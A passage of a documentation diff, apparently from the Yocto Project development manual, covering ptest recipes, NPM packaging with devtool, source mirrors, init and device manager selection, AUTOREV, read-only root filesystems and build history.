+all installed ptest test suites and runs them in sequence. Consequently,
+you might want to add this package to your image.
+
+Getting Your Package Ready
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+In order to enable a recipe to run installed ptests on target hardware,
+you need to prepare the recipes that build the packages you want to
+test. Here is what you have to do for each recipe:
+
+- *Be sure the recipe inherits
+ the* :ref:`ptest <ref-classes-ptest>` *class:*
+ Include the following line in each recipe:
+ ::
+
+ inherit ptest
+
+- *Create run-ptest:* This script starts your test. Locate the
+ script where you will refer to it using
+ :term:`SRC_URI`. Here is an
+ example that starts a test for ``dbus``:
+ ::
+
+ #!/bin/sh
+ cd test
+ make -k runtest-TESTS
+
+- *Ensure dependencies are met:* If the test adds build or runtime
+ dependencies that normally do not exist for the package (such as
+ requiring "make" to run the test suite), use the
+ :term:`DEPENDS` and
+ :term:`RDEPENDS` variables in
+ your recipe in order for the package to meet the dependencies. Here
+ is an example where the package has a runtime dependency on "make":
+ ::
+
+ RDEPENDS_${PN}-ptest += "make"
+
+- *Add a function to build the test suite:* Not many packages support
+ cross-compilation of their test suites. Consequently, you usually
+ need to add a cross-compilation function to the package.
+
+ Many packages based on Automake compile and run the test suite by
+ using a single command such as ``make check``. However, the host
+ ``make check`` builds and runs on the same computer, while
+ cross-compiling requires that the package is built on the host but
+ executed for the target architecture (though often, as in the case
+ for ptest, the execution occurs on the host). The built version of
+ Automake that ships with the Yocto Project includes a patch that
+ separates building and execution. Consequently, packages that use the
+ unaltered, patched version of ``make check`` automatically
+ cross-compiles.
+
+ Regardless, you still must add a ``do_compile_ptest`` function to
+ build the test suite. Add a function similar to the following to your
+ recipe:
+ ::
+
+ do_compile_ptest() {
+ oe_runmake buildtest-TESTS
+ }
+
+- *Ensure special configurations are set:* If the package requires
+ special configurations prior to compiling the test code, you must
+ insert a ``do_configure_ptest`` function into the recipe.
+
+- *Install the test suite:* The ``ptest`` class automatically copies
+ the file ``run-ptest`` to the target and then runs make
+ ``install-ptest`` to run the tests. If this is not enough, you need
+ to create a ``do_install_ptest`` function and make sure it gets
+ called after the "make install-ptest" completes.
+
+Creating Node Package Manager (NPM) Packages
+--------------------------------------------
+
+`NPM <https://en.wikipedia.org/wiki/Npm_(software)>`__ is a package
+manager for the JavaScript programming language. The Yocto Project
+supports the NPM :ref:`fetcher <bitbake:bb-fetchers>`. You can
+use this fetcher in combination with
+:doc:`devtool <../ref-manual/ref-devtool-reference>` to create
+recipes that produce NPM packages.
+
+Two workflows exist that allow you to create NPM packages using
+``devtool``: the NPM registry modules method and the NPM project code
+method.
+
+.. note::
+
+ While it is possible to create NPM recipes manually, using
+ ``devtool`` is far simpler.
+
+Additionally, some requirements and caveats exist.
+
+.. _npm-package-creation-requirements:
+
+Requirements and Caveats
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+You need to be aware of the following before using ``devtool`` to create
+NPM packages:
+
+- Of the two methods that you can use ``devtool`` to create NPM
+ packages, the registry approach is slightly simpler. However, you
+ might consider the project approach because you do not have to
+ publish your module in the NPM registry
+ (`npm-registry <https://docs.npmjs.com/misc/registry>`_), which
+ is NPM's public registry.
+
+- Be familiar with
+ :doc:`devtool <../ref-manual/ref-devtool-reference>`.
+
+- The NPM host tools need the native ``nodejs-npm`` package, which is
+ part of the OpenEmbedded environment. You need to get the package by
+ cloning the https://github.com/openembedded/meta-openembedded
+ repository out of GitHub. Be sure to add the path to your local copy
+ to your ``bblayers.conf`` file.
+
+- ``devtool`` cannot detect native libraries in module dependencies.
+ Consequently, you must manually add packages to your recipe.
+
+- While deploying NPM packages, ``devtool`` cannot determine which
+ dependent packages are missing on the target (e.g. the node runtime
+ ``nodejs``). Consequently, you need to find out what files are
+ missing and be sure they are on the target.
+
+- Although you might not need NPM to run your node package, it is
+ useful to have NPM on your target. The NPM package name is
+ ``nodejs-npm``.
+
+.. _npm-using-the-registry-modules-method:
+
+Using the Registry Modules Method
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This section presents an example that uses the ``cute-files`` module,
+which is a file browser web application.
+
+.. note::
+
+ You must know the ``cute-files`` module version.
+
+The first thing you need to do is use ``devtool`` and the NPM fetcher to
+create the recipe:
+::
+
+ $ devtool add "npm://registry.npmjs.org;package=cute-files;version=1.0.2"
+
+The
+``devtool add`` command runs ``recipetool create`` and uses the same
+fetch URI to download each dependency and capture license details where
+possible. The result is a generated recipe.
+
+The recipe file is fairly simple and contains every license that
+``recipetool`` finds and includes the licenses in the recipe's
+:term:`LIC_FILES_CHKSUM`
+variables. You need to examine the variables and look for those with
+"unknown" in the :term:`LICENSE`
+field. You need to track down the license information for "unknown"
+modules and manually add the information to the recipe.
+
+``recipetool`` creates a "shrinkwrap" file for your recipe. Shrinkwrap
+files capture the version of all dependent modules. Many packages do not
+provide shrinkwrap files. ``recipetool`` create a shrinkwrap file as it
+runs.
+
+.. note::
+
+ A package is created for each sub-module. This policy is the only
+ practical way to have the licenses for all of the dependencies
+ represented in the license manifest of the image.
+
+The ``devtool edit-recipe`` command lets you take a look at the recipe:
+::
+
+ $ devtool edit-recipe cute-files
+ SUMMARY = "Turn any folder on your computer into a cute file browser, available on the local network."
+ LICENSE = "MIT & ISC & Unknown"
+ LIC_FILES_CHKSUM = "file://LICENSE;md5=71d98c0a1db42956787b1909c74a86ca \
+ file://node_modules/toidentifier/LICENSE;md5=1a261071a044d02eb6f2bb47f51a3502 \
+ file://node_modules/debug/LICENSE;md5=ddd815a475e7338b0be7a14d8ee35a99 \
+ ...
+ SRC_URI = " \
+ npm://registry.npmjs.org/;package=cute-files;version=${PV} \
+ npmsw://${THISDIR}/${BPN}/npm-shrinkwrap.json \
+ "
+ S = "${WORKDIR}/npm"
+ inherit npm LICENSE_${PN} = "MIT"
+ LICENSE_${PN}-accepts = "MIT"
+ LICENSE_${PN}-array-flatten = "MIT"
+ ...
+ LICENSE_${PN}-vary = "MIT"
+
+Three key points exist in the previous example:
+
+- :term:`SRC_URI` uses the NPM
+ scheme so that the NPM fetcher is used.
+
+- ``recipetool`` collects all the license information. If a
+ sub-module's license is unavailable, the sub-module's name appears in
+ the comments.
+
+- The ``inherit npm`` statement causes the
+ :ref:`npm <ref-classes-npm>` class to package
+ up all the modules.
+
+You can run the following command to build the ``cute-files`` package:
+::
+
+ $ devtool build cute-files
+
+Remember that ``nodejs`` must be installed on
+the target before your package.
+
+Assuming 192.168.7.2 for the target's IP address, use the following
+command to deploy your package:
+::
+
+ $ devtool deploy-target -s cute-files root@192.168.7.2
+
+Once the package is installed on the target, you can
+test the application:
+
+.. note::
+
+ Because of a known issue, you cannot simply run ``cute-files`` as you would
+ if you had run ``npm install``.
+
+::
+
+ $ cd /usr/lib/node_modules/cute-files
+ $ node cute-files.js
+
+On a browser,
+go to ``http://192.168.7.2:3000`` and you see the following:
+
+.. image:: figures/cute-files-npm-example.png
+ :align: center
+
+You can find the recipe in ``workspace/recipes/cute-files``. You can use
+the recipe in any layer you choose.
+
+.. _npm-using-the-npm-projects-method:
+
+Using the NPM Projects Code Method
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Although it is useful to package modules already in the NPM registry,
+adding ``node.js`` projects under development is a more common developer
+use case.
+
+This section covers the NPM projects code method, which is very similar
+to the "registry" approach described in the previous section. In the NPM
+projects method, you provide ``devtool`` with an URL that points to the
+source files.
+
+Replicating the same example, (i.e. ``cute-files``) use the following
+command:
+::
+
+ $ devtool add https://github.com/martinaglv/cute-files.git
+
+The
+recipe this command generates is very similar to the recipe created in
+the previous section. However, the ``SRC_URI`` looks like the following:
+::
+
+ SRC_URI = " \
+ git://github.com/martinaglv/cute-files.git;protocol=https \
+ npmsw://${THISDIR}/${BPN}/npm-shrinkwrap.json \
+ "
+
+In this example,
+the main module is taken from the Git repository and dependencies are
+taken from the NPM registry. Other than those differences, the recipe is
+basically the same between the two methods. You can build and deploy the
+package exactly as described in the previous section that uses the
+registry modules method.
+
+Adding custom metadata to packages
+----------------------------------
+
+The variable
+:term:`PACKAGE_ADD_METADATA`
+can be used to add additional metadata to packages. This is reflected in
+the package control/spec file. To take the ipk format for example, the
+CONTROL file stored inside would contain the additional metadata as
+additional lines.
+
+The variable can be used in multiple ways, including using suffixes to
+set it for a specific package type and/or package. Note that the order
+of precedence is the same as this list:
+
+- ``PACKAGE_ADD_METADATA_<PKGTYPE>_<PN>``
+
+- ``PACKAGE_ADD_METADATA_<PKGTYPE>``
+
+- ``PACKAGE_ADD_METADATA_<PN>``
+
+- ``PACKAGE_ADD_METADATA``
+
+`<PKGTYPE>` is a parameter and expected to be a distinct name of specific
+package type:
+
+- IPK for .ipk packages
+
+- DEB for .deb packages
+
+- RPM for .rpm packages
+
+`<PN>` is a parameter and expected to be a package name.
+
+The variable can contain multiple [one-line] metadata fields separated
+by the literal sequence '\\n'. The separator can be redefined using the
+variable flag ``separator``.
+
+The following is an example that adds two custom fields for ipk
+packages:
+::
+
+ PACKAGE_ADD_METADATA_IPK = "Vendor: CustomIpk\nGroup:Applications/Spreadsheets"
+
+Efficiently Fetching Source Files During a Build
+================================================
+
+The OpenEmbedded build system works with source files located through
+the :term:`SRC_URI` variable. When
+you build something using BitBake, a big part of the operation is
+locating and downloading all the source tarballs. For images,
+downloading all the source for various packages can take a significant
+amount of time.
+
+This section shows you how you can use mirrors to speed up fetching
+source files and how you can pre-fetch files all of which leads to more
+efficient use of resources and time.
+
+Setting up Effective Mirrors
+----------------------------
+
+A good deal that goes into a Yocto Project build is simply downloading
+all of the source tarballs. Maybe you have been working with another
+build system (OpenEmbedded or Angstrom) for which you have built up a
+sizable directory of source tarballs. Or, perhaps someone else has such
+a directory for which you have read access. If so, you can save time by
+adding statements to your configuration file so that the build process
+checks local directories first for existing tarballs before checking the
+Internet.
+
+Here is an efficient way to set it up in your ``local.conf`` file:
+::
+
+ SOURCE_MIRROR_URL ?= "file:///home/you/your-download-dir/"
+ INHERIT += "own-mirrors"
+ BB_GENERATE_MIRROR_TARBALLS = "1"
+ # BB_NO_NETWORK = "1"
+
+In the previous example, the
+:term:`BB_GENERATE_MIRROR_TARBALLS`
+variable causes the OpenEmbedded build system to generate tarballs of
+the Git repositories and store them in the
+:term:`DL_DIR` directory. Due to
+performance reasons, generating and storing these tarballs is not the
+build system's default behavior.
+
+You can also use the
+:term:`PREMIRRORS` variable. For
+an example, see the variable's glossary entry in the Yocto Project
+Reference Manual.
+
+Getting Source Files and Suppressing the Build
+----------------------------------------------
+
+Another technique you can use to ready yourself for a successive string
+of build operations, is to pre-fetch all the source files without
+actually starting a build. This technique lets you work through any
+download issues and ultimately gathers all the source files into your
+download directory :ref:`structure-build-downloads`,
+which is located with :term:`DL_DIR`.
+
+Use the following BitBake command form to fetch all the necessary
+sources without starting the build:
+::
+
+ $ bitbake target --runall=fetch
+
+This
+variation of the BitBake command guarantees that you have all the
+sources for that BitBake target should you disconnect from the Internet
+and want to do the build later offline.
+
+Selecting an Initialization Manager
+===================================
+
+By default, the Yocto Project uses SysVinit as the initialization
+manager. However, support also exists for systemd, which is a full
+replacement for init with parallel starting of services, reduced shell
+overhead and other features that are used by many distributions.
+
+Within the system, SysVinit treats system components as services. These
+services are maintained as shell scripts stored in the ``/etc/init.d/``
+directory. Services organize into different run levels. This
+organization is maintained by putting links to the services in the
+``/etc/rcN.d/`` directories, where `N/` is one of the following options:
+"S", "0", "1", "2", "3", "4", "5", or "6".
+
+.. note::
+
+ Each runlevel has a dependency on the previous runlevel. This
+ dependency allows the services to work properly.
+
+In comparison, systemd treats components as units. Using units is a
+broader concept as compared to using a service. A unit includes several
+different types of entities. Service is one of the types of entities.
+The runlevel concept in SysVinit corresponds to the concept of a target
+in systemd, where target is also a type of supported unit.
+
+In a SysVinit-based system, services load sequentially (i.e. one by one)
+during init and parallelization is not supported. With systemd, services
+start in parallel. Needless to say, the method can have an impact on
+system startup performance.
+
+If you want to use SysVinit, you do not have to do anything. But, if you
+want to use systemd, you must take some steps as described in the
+following sections.
+
+Using systemd Exclusively
+-------------------------
+
+Set these variables in your distribution configuration file as follows:
+::
+
+ DISTRO_FEATURES_append = " systemd"
+ VIRTUAL-RUNTIME_init_manager = "systemd"
+
+You can also prevent the SysVinit distribution feature from
+being automatically enabled as follows:
+::
+
+ DISTRO_FEATURES_BACKFILL_CONSIDERED = "sysvinit"
+
+Doing so removes any
+redundant SysVinit scripts.
+
+To remove initscripts from your image altogether, set this variable
+also:
+::
+
+ VIRTUAL-RUNTIME_initscripts = ""
+
+For information on the backfill variable, see
+:term:`DISTRO_FEATURES_BACKFILL_CONSIDERED`.
+
+Using systemd for the Main Image and Using SysVinit for the Rescue Image
+------------------------------------------------------------------------
+
+Set these variables in your distribution configuration file as follows:
+::
+
+ DISTRO_FEATURES_append = " systemd"
+ VIRTUAL-RUNTIME_init_manager = "systemd"
+
+Doing so causes your main image to use the
+``packagegroup-core-boot.bb`` recipe and systemd. The rescue/minimal
+image cannot use this package group. However, it can install SysVinit
+and the appropriate packages will have support for both systemd and
+SysVinit.
+
+.. _selecting-dev-manager:
+
+Selecting a Device Manager
+==========================
+
+The Yocto Project provides multiple ways to manage the device manager
+(``/dev``):
+
+- Persistent and Pre-Populated\ ``/dev``: For this case, the ``/dev``
+ directory is persistent and the required device nodes are created
+ during the build.
+
+- Use ``devtmpfs`` with a Device Manager: For this case, the ``/dev``
+ directory is provided by the kernel as an in-memory file system and
+ is automatically populated by the kernel at runtime. Additional
+ configuration of device nodes is done in user space by a device
+ manager like ``udev`` or ``busybox-mdev``.
+
+.. _static-dev-management:
+
+Using Persistent and Pre-Populated\ ``/dev``
+--------------------------------------------
+
+To use the static method for device population, you need to set the
+:term:`USE_DEVFS` variable to "0"
+as follows:
+::
+
+ USE_DEVFS = "0"
+
+The content of the resulting ``/dev`` directory is defined in a Device
+Table file. The
+:term:`IMAGE_DEVICE_TABLES`
+variable defines the Device Table to use and should be set in the
+machine or distro configuration file. Alternatively, you can set this
+variable in your ``local.conf`` configuration file.
+
+If you do not define the ``IMAGE_DEVICE_TABLES`` variable, the default
+``device_table-minimal.txt`` is used:
+::
+
+ IMAGE_DEVICE_TABLES = "device_table-mymachine.txt"
+
+The population is handled by the ``makedevs`` utility during image
+creation:
+
+.. _devtmpfs-dev-management:
+
+Using ``devtmpfs`` and a Device Manager
+---------------------------------------
+
+To use the dynamic method for device population, you need to use (or be
+sure to set) the :term:`USE_DEVFS`
+variable to "1", which is the default:
+::
+
+ USE_DEVFS = "1"
+
+With this
+setting, the resulting ``/dev`` directory is populated by the kernel
+using ``devtmpfs``. Make sure the corresponding kernel configuration
+variable ``CONFIG_DEVTMPFS`` is set when building you build a Linux
+kernel.
+
+All devices created by ``devtmpfs`` will be owned by ``root`` and have
+permissions ``0600``.
+
+To have more control over the device nodes, you can use a device manager
+like ``udev`` or ``busybox-mdev``. You choose the device manager by
+defining the ``VIRTUAL-RUNTIME_dev_manager`` variable in your machine or
+distro configuration file. Alternatively, you can set this variable in
+your ``local.conf`` configuration file:
+::
+
+ VIRTUAL-RUNTIME_dev_manager = "udev"
+
+ # Some alternative values
+ # VIRTUAL-RUNTIME_dev_manager = "busybox-mdev"
+ # VIRTUAL-RUNTIME_dev_manager = "systemd"
+
+.. _platdev-appdev-srcrev:
+
+Using an External SCM
+=====================
+
+If you're working on a recipe that pulls from an external Source Code
+Manager (SCM), it is possible to have the OpenEmbedded build system
+notice new recipe changes added to the SCM and then build the resulting
+packages that depend on the new recipes by using the latest versions.
+This only works for SCMs from which it is possible to get a sensible
+revision number for changes. Currently, you can do this with Apache
+Subversion (SVN), Git, and Bazaar (BZR) repositories.
+
+To enable this behavior, the :term:`PV` of
+the recipe needs to reference
+:term:`SRCPV`. Here is an example:
+::
+
+ PV = "1.2.3+git${SRCPV}"
+
+Then, you can add the following to your
+``local.conf``:
+::
+
+ SRCREV_pn-PN = "${AUTOREV}"
+
+:term:`PN` is the name of the recipe for
+which you want to enable automatic source revision updating.
+
+If you do not want to update your local configuration file, you can add
+the following directly to the recipe to finish enabling the feature:
+::
+
+ SRCREV = "${AUTOREV}"
+
+The Yocto Project provides a distribution named ``poky-bleeding``, whose
+configuration file contains the line:
+::
+
+ require conf/distro/include/poky-floating-revisions.inc
+
+This line pulls in the
+listed include file that contains numerous lines of exactly that form:
+::
+
+ #SRCREV_pn-opkg-native ?= "${AUTOREV}"
+ #SRCREV_pn-opkg-sdk ?= "${AUTOREV}"
+ #SRCREV_pn-opkg ?= "${AUTOREV}"
+ #SRCREV_pn-opkg-utils-native ?= "${AUTOREV}"
+ #SRCREV_pn-opkg-utils ?= "${AUTOREV}"
+ SRCREV_pn-gconf-dbus ?= "${AUTOREV}"
+ SRCREV_pn-matchbox-common ?= "${AUTOREV}"
+ SRCREV_pn-matchbox-config-gtk ?= "${AUTOREV}"
+ SRCREV_pn-matchbox-desktop ?= "${AUTOREV}"
+ SRCREV_pn-matchbox-keyboard ?= "${AUTOREV}"
+ SRCREV_pn-matchbox-panel-2 ?= "${AUTOREV}"
+ SRCREV_pn-matchbox-themes-extra ?= "${AUTOREV}"
+ SRCREV_pn-matchbox-terminal ?= "${AUTOREV}"
+ SRCREV_pn-matchbox-wm ?= "${AUTOREV}"
+ SRCREV_pn-settings-daemon ?= "${AUTOREV}"
+ SRCREV_pn-screenshot ?= "${AUTOREV}"
+ . . .
+
+These lines allow you to
+experiment with building a distribution that tracks the latest
+development source for numerous packages.
+
+.. note::
+
+ The ``poky-bleeding`` distribution is not tested on a regular basis. Keep
+ this in mind if you use it.
+
+Creating a Read-Only Root Filesystem
+====================================
+
+Suppose, for security reasons, you need to disable your target device's
+root filesystem's write permissions (i.e. you need a read-only root
+filesystem). Or, perhaps you are running the device's operating system
+from a read-only storage device. For either case, you can customize your
+image for that behavior.
+
+.. note::
+
+ Supporting a read-only root filesystem requires that the system and
+ applications do not try to write to the root filesystem. You must
+ configure all parts of the target system to write elsewhere, or to
+ gracefully fail in the event of attempting to write to the root
+ filesystem.
+
+Creating the Root Filesystem
+----------------------------
+
+To create the read-only root filesystem, simply add the
+"read-only-rootfs" feature to your image, normally in one of two ways.
+The first way is to add the "read-only-rootfs" image feature in the
+image's recipe file via the ``IMAGE_FEATURES`` variable:
+::
+
+ IMAGE_FEATURES += "read-only-rootfs"
+
+As an alternative, you can add the same feature
+from within your build directory's ``local.conf`` file with the
+associated ``EXTRA_IMAGE_FEATURES`` variable, as in:
+::
+
+ EXTRA_IMAGE_FEATURES = "read-only-rootfs"
+
+For more information on how to use these variables, see the
+":ref:`usingpoky-extend-customimage-imagefeatures`"
+section. For information on the variables, see
+:term:`IMAGE_FEATURES` and
+:term:`EXTRA_IMAGE_FEATURES`.
+
+Post-Installation Scripts and Read-Only Root Filesystem
+-------------------------------------------------------
+
+It is very important that you make sure all post-Installation
+(``pkg_postinst``) scripts for packages that are installed into the
+image can be run at the time when the root filesystem is created during
+the build on the host system. These scripts cannot attempt to run during
+first-boot on the target device. With the "read-only-rootfs" feature
+enabled, the build system checks during root filesystem creation to make
+sure all post-installation scripts succeed. If any of these scripts
+still need to be run after the root filesystem is created, the build
+immediately fails. These build-time checks ensure that the build fails
+rather than the target device fails later during its initial boot
+operation.
+
+Most of the common post-installation scripts generated by the build
+system for the out-of-the-box Yocto Project are engineered so that they
+can run during root filesystem creation (e.g. post-installation scripts
+for caching fonts). However, if you create and add custom scripts, you
+need to be sure they can be run during this file system creation.
+
+Here are some common problems that prevent post-installation scripts
+from running during root filesystem creation:
+
+- *Not using $D in front of absolute paths:* The build system defines
+ ``$``\ :term:`D` when the root
+ filesystem is created. Furthermore, ``$D`` is blank when the script
+ is run on the target device. This implies two purposes for ``$D``:
+ ensuring paths are valid in both the host and target environments,
+ and checking to determine which environment is being used as a method
+ for taking appropriate actions.
+
+- *Attempting to run processes that are specific to or dependent on the
+ target architecture:* You can work around these attempts by using
+ native tools, which run on the host system, to accomplish the same
+ tasks, or by alternatively running the processes under QEMU, which
+ has the ``qemu_run_binary`` function. For more information, see the
+ :ref:`qemu <ref-classes-qemu>` class.
+
+Areas With Write Access
+-----------------------
+
+With the "read-only-rootfs" feature enabled, any attempt by the target
+to write to the root filesystem at runtime fails. Consequently, you must
+make sure that you configure processes and applications that attempt
+these types of writes do so to directories with write access (e.g.
+``/tmp`` or ``/var/run``).
+
+Maintaining Build Output Quality
+================================
+
+Many factors can influence the quality of a build. For example, if you
+upgrade a recipe to use a new version of an upstream software package or
+you experiment with some new configuration options, subtle changes can
+occur that you might not detect until later. Consider the case where
+your recipe is using a newer version of an upstream package. In this
+case, a new version of a piece of software might introduce an optional
+dependency on another library, which is auto-detected. If that library
+has already been built when the software is building, the software will
+link to the built library and that library will be pulled into your
+image along with the new software even if you did not want the library.
+
+The :ref:`buildhistory <ref-classes-buildhistory>`
+class exists to help you maintain the quality of your build output. You
+can use the class to highlight unexpected and possibly unwanted changes
+in the build output. When you enable build history, it records
+information about the contents of each package and image and then
+commits that information to a local Git repository where you can examine
+the information.
+
+The remainder of this section describes the following:
+
+- :ref:`How you can enable and disable build history <dev-manual/dev-manual-common-tasks:enabling and disabling build history>`
+
+- :ref:`How to understand what the build history contains <dev-manual/dev-manual-common-tasks:understanding what the build history contains>`
+
+- :ref:`How to limit the information used for build history <dev-manual/dev-manual-common-tasks:using build history to gather image information only>`
+
+- :ref:`How to examine the build history from both a command-line and web interface <dev-manual/dev-manual-common-tasks:examining build history information>`
+
+Enabling and Disabling Build History
+------------------------------------
+
+Build history is disabled by default. To enable it, add the following
+``INHERIT`` statement and set the
+:term:`BUILDHISTORY_COMMIT`
+variable to "1" at the end of your ``conf/local.conf`` file found in the
+:term:`Build Directory`:
+::
+
+ INHERIT += "buildhistory"
+ BUILDHISTORY_COMMIT = "1"
+
+Enabling build history as
+previously described causes the OpenEmbedded build system to collect
+build output information and commit it as a single commit to a local
+:ref:`overview-manual/overview-manual-development-environment:git` repository.
+
+.. note::
+
+ Enabling build history increases your build times slightly,
+ particularly for images, and increases the amount of disk space used
+ during the build.
+
+You can disable build history by removing the previous statements from
+your ``conf/local.conf`` file.
+
+Understanding What the Build History Contains
+---------------------------------------------
+
+Build history information is kept in
+``${``\ :term:`TOPDIR`\ ``}/buildhistory``
+in the Build Directory as defined by the
+:term:`BUILDHISTORY_DIR`
+variable. The following is an example abbreviated listing:
+
+.. image:: figures/buildhistory.png
+ :align: center
+
+At the top level, a ``metadata-revs`` file exists that lists the
+revisions of the repositories for the enabled layers when the build was
+produced. The rest of the data splits into separate ``packages``,
+``images`` and ``sdk`` directories, the contents of which are described
+as follows.
+
+Build History Package Information
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The history for each package contains a text file that has name-value
+pairs with information about the package. For example,
+``buildhistory/packages/i586-poky-linux/busybox/busybox/latest``
+contains the following:
+
+.. code-block:: none
+
+ PV = 1.22.1
+ PR = r32
+ RPROVIDES =
+ RDEPENDS = glibc (>= 2.20) update-alternatives-opkg
+ RRECOMMENDS = busybox-syslog busybox-udhcpc update-rc.d
+ PKGSIZE = 540168
+ FILES = /usr/bin/* /usr/sbin/* /usr/lib/busybox/* /usr/lib/lib*.so.* \
+ /etc /com /var /bin/* /sbin/* /lib/*.so.* /lib/udev/rules.d \
+ /usr/lib/udev/rules.d /usr/share/busybox /usr/lib/busybox/* \
+ /usr/share/pixmaps /usr/share/applications /usr/share/idl \
+ /usr/share/omf /usr/share/sounds /usr/lib/bonobo/servers
+ FILELIST = /bin/busybox /bin/busybox.nosuid /bin/busybox.suid /bin/sh \
+ /etc/busybox.links.nosuid /etc/busybox.links.suid
+
+Most of these
+name-value pairs correspond to variables used to produce the package.
+The exceptions are ``FILELIST``, which is the actual list of files in
+the package, and ``PKGSIZE``, which is the total size of files in the
+package in bytes.
+
+A file also exists that corresponds to the recipe from which the package
+came (e.g. ``buildhistory/packages/i586-poky-linux/busybox/latest``):
+
+.. code-block:: none
+
+ PV = 1.22.1
+ PR = r32
+ DEPENDS = initscripts kern-tools-native update-rc.d-native \
+ virtual/i586-poky-linux-compilerlibs virtual/i586-poky-linux-gcc \
+ virtual/libc virtual/update-alternatives
+ PACKAGES = busybox-ptest busybox-httpd busybox-udhcpd busybox-udhcpc \
+ busybox-syslog busybox-mdev busybox-hwclock busybox-dbg \
+ busybox-staticdev busybox-dev busybox-doc busybox-locale busybox
+
+Finally, for those recipes fetched from a version control system (e.g.,
+Git), a file exists that lists source revisions that are specified in
+the recipe and lists the actual revisions used during the build. Listed
+and actual revisions might differ when
+:term:`SRCREV` is set to
+${:term:`AUTOREV`}. Here is an
+example assuming
+``buildhistory/packages/qemux86-poky-linux/linux-yocto/latest_srcrev``):
+::
+
+ # SRCREV_machine = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
+ SRCREV_machine = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
+ # SRCREV_meta = "a227f20eff056e511d504b2e490f3774ab260d6f"
+ SRCREV_meta ="a227f20eff056e511d504b2e490f3774ab260d6f"
+
+You can use the
+``buildhistory-collect-srcrevs`` command with the ``-a`` option to
+collect the stored ``SRCREV`` values from build history and report them
+in a format suitable for use in global configuration (e.g.,
+``local.conf`` or a distro include file) to override floating
+``AUTOREV`` values to a fixed set of revisions. Here is some example
+output from this command:
+::
+
+ $ buildhistory-collect-srcrevs -a
+ # i586-poky-linux
+ SRCREV_pn-glibc = "b8079dd0d360648e4e8de48656c5c38972621072"
+ SRCREV_pn-glibc-initial = "b8079dd0d360648e4e8de48656c5c38972621072"
+ SRCREV_pn-opkg-utils = "53274f087565fd45d8452c5367997ba6a682a37a"
+ SRCREV_pn-kmod = "fd56638aed3fe147015bfa10ed4a5f7491303cb4"
+ # x86_64-linux
+ SRCREV_pn-gtk-doc-stub-native = "1dea266593edb766d6d898c79451ef193eb17cfa"
+ SRCREV_pn-dtc-native = "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf"
+ SRCREV_pn-update-rc.d-native = "eca680ddf28d024954895f59a241a622dd575c11"
+ SRCREV_glibc_pn-cross-localedef-native = "b8079dd0d360648e4e8de48656c5c38972621072"
+ SRCREV_localedef_pn-cross-localedef-native = "c833367348d39dad7ba018990bfdaffaec8e9ed3"
+ SRCREV_pn-prelink-native = "faa069deec99bf61418d0bab831c83d7c1b797ca"
+ SRCREV_pn-opkg-utils-native = "53274f087565fd45d8452c5367997ba6a682a37a"
+ SRCREV_pn-kern-tools-native = "23345b8846fe4bd167efdf1bd8a1224b2ba9a5ff"
+ SRCREV_pn-kmod-native = "fd56638aed3fe147015bfa10ed4a5f7491303cb4"
+ # qemux86-poky-linux
+ SRCREV_machine_pn-linux-yocto = "38cd560d5022ed2dbd1ab0dca9642e47c98a0aa1"
+ SRCREV_meta_pn-linux-yocto = "a227f20eff056e511d504b2e490f3774ab260d6f"
+ # all-poky-linux
+ SRCREV_pn-update-rc.d = "eca680ddf28d024954895f59a241a622dd575c11"
+
+.. note::
+
+ Here are some notes on using the ``buildhistory-collect-srcrevs`` command:
+
+ - By default, only values where the ``SRCREV`` was not hardcoded
+ (usually when ``AUTOREV`` is used) are reported. Use the ``-a``
+ option to see all ``SRCREV`` values.
+
+ - The output statements might not have any effect if overrides are
+ applied elsewhere in the build system configuration. Use the
+ ``-f`` option to add the ``forcevariable`` override to each output
+ line if you need to work around this restriction.
+
+ - The script does apply special handling when building for multiple
+ machines. However, the script does place a comment before each set
+ of values that specifies which triplet to which they belong as
+ previously shown (e.g., ``i586-poky-linux``).
+
+Build History Image Information
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The files produced for each image are as follows:
+
+- ``image-files:`` A directory containing selected files from the root
+ filesystem. The files are defined by
+ :term:`BUILDHISTORY_IMAGE_FILES`.
+
+- ``build-id.txt:`` Human-readable information about the build
+ configuration and metadata source revisions. This file contains the
+ full build header as printed by BitBake.
+
+- ``*.dot:`` Dependency graphs for the image that are compatible with
+ ``graphviz``.
+
+- ``files-in-image.txt:`` A list of files in the image with
+ permissions, owner, group, size, and symlink information.
+
+- ``image-info.txt:`` A text file containing name-value pairs with
+ information about the image. See the following listing example for
+ more information.
+
+- ``installed-package-names.txt:`` A list of installed packages by name
+ only.
+
+- ``installed-package-sizes.txt:`` A list of installed packages ordered
+ by size.
+
+- ``installed-packages.txt:`` A list of installed packages with full
+ package filenames.
+
+.. note::
+
+ Installed package information is able to be gathered and produced
+ even if package management is disabled for the final image.
+
+Here is an example of ``image-info.txt``:
+
+.. code-block:: none
+
+ DISTRO = poky
+ DISTRO_VERSION = 1.7
+ USER_CLASSES = buildstats image-mklibs image-prelink
+ IMAGE_CLASSES = image_types
+ IMAGE_FEATURES = debug-tweaks
+ IMAGE_LINGUAS =
+ IMAGE_INSTALL = packagegroup-core-boot run-postinsts
+ BAD_RECOMMENDATIONS =
+ NO_RECOMMENDATIONS =
+ PACKAGE_EXCLUDE =
+ ROOTFS_POSTPROCESS_COMMAND = write_package_manifest; license_create_manifest; \
+ write_image_manifest ; buildhistory_list_installed_image ; \
+ buildhistory_get_image_installed ; ssh_allow_empty_password; \
+ postinst_enable_logging; rootfs_update_timestamp ; ssh_disable_dns_lookup ;
+ IMAGE_POSTPROCESS_COMMAND = buildhistory_get_imageinfo ;
+ IMAGESIZE = 6900
+
+Other than ``IMAGESIZE``,
+which is the total size of the files in the image in Kbytes, the
+name-value pairs are variables that may have influenced the content of
+the image. This information is often useful when you are trying to
+determine why a change in the package or file listings has occurred.
+
+Using Build History to Gather Image Information Only
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+As you can see, build history produces image information, including
+dependency graphs, so you can see why something was pulled into the
+image. If you are just interested in this information and not interested
+in collecting specific package or SDK information, you can enable
